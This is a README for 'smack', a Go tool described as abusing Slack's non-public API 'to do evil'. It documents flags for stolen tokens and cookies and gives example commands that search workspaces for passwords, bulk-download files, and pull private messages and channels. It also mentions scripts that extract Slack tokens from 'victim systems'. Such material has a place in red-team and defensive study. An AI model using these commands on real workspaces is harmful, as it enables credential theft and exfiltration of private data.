Added some ergonomics fixes
Updated readme with emoji info
Added emoji command
⚠ WARNING: Experimental ⚠
A tool to use the non-public Slack user interaction API to do evil. Current / planned capabilities are as follows:
Some important sub-features planned:
git clone git.sr.ht/~poptart/smack
cd "${GOPATH}/src/git.sr.ht/~poptart/smack/cmd/smack"
go build smack.go
or
go get git.sr.ht/~poptart/smack
usage: ./smack command [-vh] [-a user_agent] [-t token]
[-x x_cookie] [-u subdomain] [-c json_config] [command specific flags]
Globally used flags:
-h: Print help and exit
-v: Verbose
-a user_agent: User-Agent string defaults to
("Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/73.0.3683.103 Safari/537.36")
-t token: Slack token to use for interactions, this is from
localStorage. Often in the format of "xoxp-*"
-x x_cookie: User authentication cookie from cookie storage
-u subdomain: The subdomain for authentication i.e.: "metasploit"
will refer to"metasploit.slack.com"
-c json_config: Read configuration from json, an example can be seen
in the source "examples/config.json". Flags should
override settings in configuation.
Command specific flags:
emoji: Retrieves information about emojis
-o: output file
-s: per user stats
files: Retrieves all files on a Slack server
-n: Do not download the documents only retrieve their information
-q query: query is used for Slack search. Currently all built in
Slack filters for text are supported, and common
type:filters are updated in the api.go file. Useful
ones are 'type:all', 'type:zip', 'type:pdf'.
-f filter: Files that content-type match filter will be selected.
This is most useful with '-q type:all' to filter for
files that Slack does not directly support for
filtering. Example: -f "application/pdf"
-o output: Where to output downloaded files too, this is expected
to be a directory
messages: Retrieves messages from a Slack server
-q query: query is used for Slack search. Currently all built in
Slack filters for text are supported
-p: retrieve messages "to" and "from" the user, aka private
messages
-o outfile: write the messages to 'outfile'
-i convid: retrieve messages from a conversation id (from channel
or conversation). Add -l option to limit the returned
results.
-l limit: only return "limit" number of responses. Must be a
integer
channels: List all channels or channel information
-q query: query for a list of channels matching this string
-o outfile: write channels to file
-p: search for only private channels
-i convid: retrive information about a specific channel by id
check: List information and check configuration
-o outfile: write channels to file
-q: do not output anything except errors, useful for quick checks
Subcommands:
examples/config.json
as a template (NOTE: some API's might need different arguments. Generally URL, Token, and B cookie are needed)./smack check -c examples/fakeserver.json
./smack files -c examples/fakeserver.json -q "type:zip" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:zip password" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:all" -f "text/plain" -o /tmp/
./smack messages -c examples/fakeserver.json -q "wifi password"
./smack messages -c examples/fakeserver.json -p
./smack channels -c examples/fakeserver.json
./smack channels -c examples/fakeserver.json -p -q "devops"
The smack project also attempts to maintain a way to extract the Slack tokens from victim systems. It additionally attempts to have functionality for many types of systems and many different methods for extractions. The following list of extractors is either in the works or exists:
cmd/extractors/linux/extract.sh
- Runs a bunch of strings on leveldb to extract tokenscmd/extractors/win/cs/
- (PLANNED)cmd/extractors/win/go/
- (PLANNED)